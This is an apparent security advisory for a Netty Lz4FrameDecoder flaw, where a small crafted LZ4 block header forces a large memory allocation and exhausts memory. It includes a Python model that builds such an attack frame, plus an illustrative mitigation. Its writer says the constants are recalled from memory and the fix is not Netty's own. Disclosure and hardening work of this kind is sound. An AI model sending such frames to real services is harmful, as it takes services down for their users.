Impact
Netty’s Lz4FrameDecoder pre‑allocates a ByteBuf sized to the decompressed‑length field of an incoming LZ4 block. That field is chosen by the sender, and the decoder accepts values up to its 32 MB maximum block size. An attacker therefore only has to send the 21‑byte block header carrying a large decompressed length together with a very small compressed payload: the decoder reserves the full‑size output buffer before any decompression takes place, and so before anything checks that the payload could actually expand to that size. Sending such frames repeatedly, or over many connections, depletes heap or direct memory and takes the service down without any code execution. The root weakness is uncontrolled resource consumption (CWE‑400), arising from allocation of resources without limits or throttling (CWE‑770).
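To make the size asymmetry concrete, the following is an added example (not code from the advisory or from the Netty project) that models the block header as Lz4FrameDecoder reads it and the two behaviours the paragraph contrasts: the vulnerable path, which reserves decompressedLength bytes as soon as the header and the tiny compressed payload have arrived, and an illustrative hardening that bounds the claimed output by the compressed size. The header layout (8‑byte "LZ4Block" magic, 1 token byte, little‑endian compressed length, decompressed length and checksum) and the constants follow the Netty 4.1 Lz4Constants/Lz4FrameDecoder source as I recall it; the 255× expansion bound and the function names are my assumptions, not Netty’s actual patch.

```python
import struct

# Constants mirroring Netty's Lz4Constants (from the 4.1 source as recalled;
# re-check against the version you run).
MAGIC = b"LZ4Block"                      # 8-byte magic, read as a big-endian long
HEADER_LENGTH = 8 + 1 + 4 + 4 + 4        # magic + token + compressedLength + decompressedLength + checksum = 21
BLOCK_TYPE_NON_COMPRESSED = 0x10
BLOCK_TYPE_COMPRESSED = 0x20
COMPRESSION_LEVEL_BASE = 10
MAX_BLOCK_SIZE = 1 << (COMPRESSION_LEVEL_BASE + 0x0F)   # 32 MiB

# Assumption for the illustrative mitigation: an LZ4 block cannot expand by more
# than this factor, so decompressedLength > compressedLength * 255 is never legitimate.
LZ4_MAX_EXPANSION = 255


def build_header(compressed_len, decompressed_len, level=0x0F,
                 block_type=BLOCK_TYPE_COMPRESSED, checksum=0):
    """Constructed 21-byte block header in the layout the decoder parses.
    Netty applies Integer.reverseBytes to the three ints, so they are little-endian here."""
    token = block_type | (level & 0x0F)
    return MAGIC + bytes([token]) + struct.pack("<iii", compressed_len, decompressed_len, checksum)


def parse_header(buf):
    """Model of the checks in the decoder's INIT_BLOCK state. Returns
    (compressed_len, decompressed_len) or raises ValueError where the decoder would.
    Note what is absent: for a compressed block nothing relates decompressed_len
    to compressed_len, so 4 payload bytes may claim a 32 MiB output."""
    if len(buf) < HEADER_LENGTH:
        raise ValueError("need more data")
    if buf[:8] != MAGIC:
        raise ValueError("unexpected block identifier")
    token = buf[8]
    level = (token & 0x0F) + COMPRESSION_LEVEL_BASE
    block_type = token & 0xF0
    compressed_len, decompressed_len, _checksum = struct.unpack("<iii", buf[9:HEADER_LENGTH])
    if compressed_len < 0 or compressed_len > MAX_BLOCK_SIZE:
        raise ValueError("invalid compressedLength")
    max_decompressed = 1 << level
    if decompressed_len < 0 or decompressed_len > max_decompressed:
        raise ValueError("invalid decompressedLength")
    if (decompressed_len == 0) != (compressed_len == 0):
        raise ValueError("stream corrupted: inconsistent lengths")
    if block_type == BLOCK_TYPE_NON_COMPRESSED and decompressed_len != compressed_len:
        raise ValueError("stream corrupted: non-compressed block length mismatch")
    return compressed_len, decompressed_len


def allocation_for(frame):
    """Vulnerable behaviour as the advisory describes it: once the header and
    compressed_len payload bytes are present, a buffer of decompressed_len bytes is
    reserved before decompression runs. Returns the number of bytes that would be allocated."""
    compressed_len, decompressed_len = parse_header(frame)
    if len(frame) - HEADER_LENGTH < compressed_len:
        return 0          # decoder is still waiting for payload; nothing allocated yet
    return decompressed_len


def hardened_check(frame):
    """Illustrative mitigation (an assumption, not Netty's fix): refuse any header whose
    claimed output exceeds what its compressed payload could possibly expand to."""
    compressed_len, decompressed_len = parse_header(frame)
    if decompressed_len > compressed_len * LZ4_MAX_EXPANSION:
        raise ValueError("decompressedLength implausible for compressedLength")
    return decompressed_len


if __name__ == "__main__":
    # Constructed attack frame: 21-byte header claiming 32 MiB output + 4 payload bytes.
    frame = build_header(compressed_len=4, decompressed_len=MAX_BLOCK_SIZE) + b"\x00" * 4
    print(len(frame), allocation_for(frame))   # 25 33554432
```

The ratio is the whole story: 25 bytes on the wire drive a 33,554,432‑byte allocation, so a single client with a few thousand connections can commit gigabytes of buffer memory before the decoder ever touches the LZ4 data. Any mitigation, whether the upstream fix or a pipeline‑level guard in front of the decoder, has to tie the reserved size to something the attacker cannot inflate for free, which is what the expansion bound above does.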
Affected Systems
The vulnerability affects the Netty codec artifacts io.netty:netty-codec, io.netty:netty-codec-compression and netty:netty in every release before 4.2.13.Final (4.2.x line) and 4.1.133.Final (4.1.x line). An application is exposed if it depends on one of those versions and installs Lz4FrameDecoder in a channel pipeline that handles untrusted input.
Risk and Exploitability
The CVSS base score of 7.5 corresponds to High severity. No EPSS score is published and the vulnerability is not in the CISA KEV catalog, so the likelihood of exploitation in the wild is currently unknown. The attack surface is nonetheless broad: any peer with a network connection to a Netty service that uses this decoder can send a small crafted frame to trigger the allocation, so exploitation is straightforward once a vulnerable version has been identified.
OpenCVE Enrichment source: GitHub GHSA